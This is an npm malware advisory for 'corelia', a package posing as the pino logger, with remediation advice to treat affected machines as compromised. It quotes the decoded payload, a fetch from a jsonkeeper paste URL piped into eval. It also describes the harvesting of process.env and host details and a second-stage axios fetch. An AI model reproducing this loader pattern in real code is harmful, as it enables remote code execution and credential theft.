VYPR

npm · Malicious package advisory

Malware

corelia

MAL-2026-4536

Malicious code in corelia (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (d2b637971f597ba9572b4cecfab0de4981d19620d585b1958b1bb37b004fae8f)
The package impersonates the popular pino logger (README header 'corelia (Pino)', homepage https://getpino.io, main file pino.js, npm version badge pointing at pino, mimicked API and keywords). On require, lib/writer.js base64-decodes a string and passes it to eval(); the decoded payload calls fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret)}), executing arbitrary JavaScript fetched from an anonymous, mutable JSON paste host with no integrity verification. Immediately before the eval, the module assembles a data object spreading the entire process.env plus os.hostname(), os.userInfo().username, os.platform(), and non-internal MAC addresses, available to the eval'd payload via closure. A second hex-encoded string array decodes to ['axios','get','https://www.jsonkeeper.com/b/HY6M6','then'], staging a second-stage axios GET to another jsonkeeper paste. Any consumer that does require('corelia') triggers bulk environment scraping and remote-payload execution.

## Source: ghsa-malware (b8d7a087876a100fdf3a21646631d19c0ad9d459e6a1f6700799ea49385cbfe2)
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Compromised versions (1)

  • 4.1.12

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.